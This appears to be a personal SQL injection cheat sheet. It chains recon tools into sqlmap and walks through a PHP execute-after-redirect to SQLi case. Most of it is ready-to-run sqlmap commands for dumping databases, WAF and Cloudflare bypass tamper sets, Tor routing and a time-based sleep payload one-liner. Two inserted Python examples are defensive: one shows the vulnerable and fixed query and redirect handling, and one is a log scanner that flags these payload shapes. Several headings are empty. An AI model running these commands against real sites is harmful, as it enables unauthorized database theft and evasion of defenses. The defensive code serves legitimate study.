🚩 My SQL Injection Methodology

-------------------------------------------------------------

Automated SQL Injection Finding: waybackurls | sqlmap

  1. /root/go/bin/waybackurls http://testphp.vulnweb.com >> /home/kali/file.txt

  2. cat /home/kali/file.txt | /root/go/bin/gf sqli > sqlitest.txt

  3. sqlmap -m sqlitest.txt --level 5 --risk 3 --batch --dbs --tamper=between

-------------------------------------------------------------

PHP EAR (Execute After Redirect) to SQLi

  1. Found a PHP EAR vulnerability by checking the content length in the ffuf results.

  2. Added a Match and Replace rule for the Location header in Burp Suite to stop the redirect to the login page.

  3. Found an employee search page (access control issue).

  4. The employee search page was vulnerable to SQLi.

  5. Ran sqlmap and dumped the database.

  Commands (PoC):

  6. ffuf -u https://bsides.kuldeep.io/FUZZ.php -w raft-small-words.txt -fc 403

  7. Add a Match and Replace rule in Burp Suite to remove the Location header from the response:

     Type: Response Header

     Match: Location: index.php

  8. sqlmap -u http://bsides.kuldeep.io/esearch.php --method POST --data search_term=1

  9. sqlmap -u http://bsides.kuldeep.io/esearch.php --method POST --data search_term=1 --dbs
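The two bugs chained above (a redirect that does not stop execution, and a search term pasted into the SQL text) are easy to see side by side in code. The following Python is an added example, not code from the original notes or from the bsides.kuldeep.io target; it uses an in-memory SQLite table, a constructed tautology probe, and hypothetical handler names (handler_ear, handler_fixed, search_vulnerable, search_safe) to show why stripping the Location header exposed the search page and why a bound parameter closes the injection.

```python
import sqlite3

# Constructed in-memory stand-in for the employee table behind esearch.php.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, dept TEXT)")
    conn.executemany(
        "INSERT INTO employees (name, dept) VALUES (?, ?)",
        [("Alice", "Engineering"), ("Bob", "Finance"), ("Carol", "HR")],
    )
    conn.commit()
    return conn

# Constructed probe in the classic tautology shape: inside the vulnerable query
# it closes the string literal, ORs in an always-true condition and comments
# out the rest of the statement.
PROBE = "x' OR '1'='1' -- "

def search_vulnerable(conn, term):
    """The search term is pasted into the SQL text (the bug class sqlmap found)."""
    sql = f"SELECT name FROM employees WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, term):
    """Same query, but the term travels as a bound parameter, never as SQL."""
    sql = "SELECT name FROM employees WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]

def handler_ear(session, term, conn):
    """Mirrors the PHP EAR bug: a redirect is issued for unauthenticated
    callers, but nothing stops execution, so the privileged search still
    runs and its results are sent in the body of the 302 response."""
    response = {"status": 200, "headers": {}, "body": []}
    if not session.get("authenticated"):
        response["status"] = 302
        response["headers"]["Location"] = "index.php"
        # The missing 'return' here is the whole bug (exit() in PHP).
    response["body"] = search_safe(conn, term)
    return response

def handler_fixed(session, term, conn):
    """Redirect and stop: unauthenticated callers never reach the query."""
    if not session.get("authenticated"):
        return {"status": 302, "headers": {"Location": "index.php"}, "body": []}
    return {"status": 200, "headers": {}, "body": search_safe(conn, term)}

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal term  :", search_vulnerable(db, "ali"))
    print("vulnerable, probe        :", search_vulnerable(db, PROBE))
    print("safe, probe              :", search_safe(db, PROBE))
    print("EAR handler, no session  :", handler_ear({}, "ali", db))
    print("fixed handler, no session:", handler_fixed({}, "ali", db))
```

With the Location header removed in Burp, a browser renders exactly what handler_ear puts in the 302 body, which is why the search page was reachable without a session; handler_fixed returns before the query runs, and search_safe treats the probe as a literal pattern that matches nothing.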

-------------------------------------------------------------

Automated SQL Injection Finding using Jeeves

echo "https://example.com" | gf sqli | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 10

(1) One-Liner SQLi Finding

-------------------------------------------------------------

(2) One-Liner SQLi Finding

------------------------------------------------------------

(3) One-Liner SQLi-TimeBased Finding

------------------------------------------------------------

(4) One-Liner Subdomains SQLI Finding

------------------------------------------------------------

Bypass WAF using TOR

-----------------------------------------------------------

SQLMAP Attacks

Step-by-step sqlmap commands from a saved request file:

  1. sqlmap -r request.txt

  2. sqlmap -r request.txt --dbs

  3. sqlmap -r request.txt -D (DB Name) --tables

  4. sqlmap -r request.txt -D (DB Name) -T (Table Name) --dump

-----------------------------------------------------------

SQLi Payloads Wordlist

----------------------------------------------------------

What's your flow for detecting SQLi?

I tried many ways but was unsuccessful.

1. Use the Burp live scanner only to check for SQLi.

2. Use a time-based payload list in Burp Intruder and check the length, whether the response completes, etc.

3. Capture the requests that might be interesting and put them directly into sqlmap.

-----------------------------------------------------------

Test for SQLi in GET and POST parameters, the URL path, Cookie, User-Agent, X-Forwarded-For and custom headers in the request.

Try sqlmap --wizard

sqlmap -r loginRequest.txt -p username

sqlmap -r request.txt --level 3 --risk 2 -p number -a

-----------------------------------------------------------

(Blind SQLI) SQLMAP Bypass Cloudflare WAF - Database Takeover

sqlmap -r request.txt --dbs --risk=1 --level=3 --tamper=between,tofla

-----------------------------------------------------------

SQLMap Tamper Scripts (SQL Injection and WAF bypass)

These are some targeted tamper sets by DBMS type, good to have handy when testing:

General Tamper testing:

MSSQL:

MySQL:

-----------------------------------------------------------

What I use for MySQL enumeration and DB hacking is:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

If you have any issues, make sure you're setting these values:

--level 3 --risk 3 --flush-session --random-agent ← This is almost critical from my exp.

Remember, always try to point sqlmap to a specific GET parameter with '-p <paramname>'; for instance, for a URL with an item parameter: sqlmap -p item

One additional thing that has helped me is adding -a at the end, so it dumps anything it finds in the DB.

-----------------------------------------------------------

Bypass WAF with sqlmap

Example:

sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --dbs

sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -u "sitetarget.com/admin/login_action" --method=POST --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --dbs --technique=T

sqlmap -u "sitetarget.com/admin/login_action" --method=POST --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --headers="input field header" --dbs --technique=T

Example for newer sqlmap versions (same commands without --identify-waf, which newer releases no longer accept):

sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u "Target.com" --random-agent -v 3 --dbs

sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbs

Example: list the tables of one database from a saved HTTP POST request (poc.txt):

sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbms=MySQL -D database_target --tables

Example: injection point in a request header (X-Forwarded-For), with the injection marker '*' in the header value:

sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --drop-set-cookie --dbms=mysql --dbs

sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --dbs

Example: Cloudflare WAF, routed through the default Tor proxy:

sqlmap -u "https://target.com" --data="id=63665%20RLIKE%20-bla-blablabla" --time-sec=20 --random-agent --level=5 --risk=3 --tamper="space2comment,between,randomcase,charencode" --technique=BEUST --privileges --no-cast --tor --tor-port=9050 --tor-type=socks5 --check-tor --banner --union-char=1 --dbms=MySQL --dbs
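Every tamper script and one-liner on this page leaves a recognisable shape in the server's access log: sleep() in a query string (the Jeeves one-liner), /**/ in place of spaces (space2comment), "NOT BETWEEN 0 AND" rewrites (between), mixed-case keywords (randomcase), RLIKE, and sqlmap's own User-Agent unless --random-agent is used. As an added, defender-side example that is not part of the original notes, the Python below scans constructed log lines in the common "combined" access-log format and reports which of those shapes each request matches; the log lines, IPs, the path /esearch.php and the User-Agent strings are all constructed for the example, and the rule labels are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/Nginx "combined" format (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /esearch.php?search_term=smith HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /esearch.php?search_term=1%20AND%20(select(0)from(select(sleep(5)))v) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /esearch.php?search_term=1%20NOT%20BETWEEN%200%20AND%201 HTTP/1.1" 200 512 "-" "sqlmap/1.7-stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /esearch.php?search_term=1/**/UnIoN/**/SeLeCt/**/1,2,3 HTTP/1.1" 500 128 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /esearch.php?search_term=x%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is (label, regex) and runs against the URL-decoded, lower-cased
# request target. Lower-casing is what defeats the randomcase tamper.
RULES = [
    ("time-based sleep() probe", re.compile(r"\bsleep\s*\(")),
    ("inline comment as whitespace (space2comment)", re.compile(r"/\*.*?\*/")),
    ("NOT BETWEEN 0 AND rewrite (between)", re.compile(r"\bnot\s+between\s+0\s+and\b")),
    ("UNION SELECT", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("RLIKE operator", re.compile(r"\brlike\b")),
    ("tautology", re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+")),
]
UA_RULE = re.compile(r"sqlmap", re.IGNORECASE)

def analyse_line(line):
    """Return a record for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("target")).lower()
    # Keep the raw decoded form for the comment rule, and a copy with comments
    # squashed to spaces so "UnIoN/**/SeLeCt" still hits the UNION SELECT rule.
    squashed = re.sub(r"/\*.*?\*/", " ", decoded)
    reasons = [label for label, rx in RULES if rx.search(decoded) or rx.search(squashed)]
    if UA_RULE.search(m.group("ua")):
        reasons.append("sqlmap user-agent")
    return {"ip": m.group("ip"), "target": m.group("target"),
            "status": m.group("status"), "reasons": reasons}

def scan_log(text):
    """Return only the lines that matched at least one rule, with line numbers."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        rec = analyse_line(line)
        if rec and rec["reasons"]:
            rec["line"] = n
            hits.append(rec)
    return hits

def hits_per_ip(hits):
    """Count flagged requests per source IP; a burst from one IP is the sqlmap signature."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"line {h['line']} {h['ip']} {h['status']} {h['target']}")
        for r in h["reasons"]:
            print(f"    - {r}")
    print("flagged requests per IP:", hits_per_ip(found))
```

The User-Agent rule only catches a default sqlmap run; the commands on this page all pass --random-agent, so the payload-shape rules and the per-IP burst count are the signals that survive. The rules are deliberately narrow to keep false positives low; a real deployment would add the request body for POST injections (search_term above is a POST parameter on the target page) and the X-Forwarded-For header, neither of which appears in a default combined log.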

-----------------------------------------------------------

Login Page Exploit Method
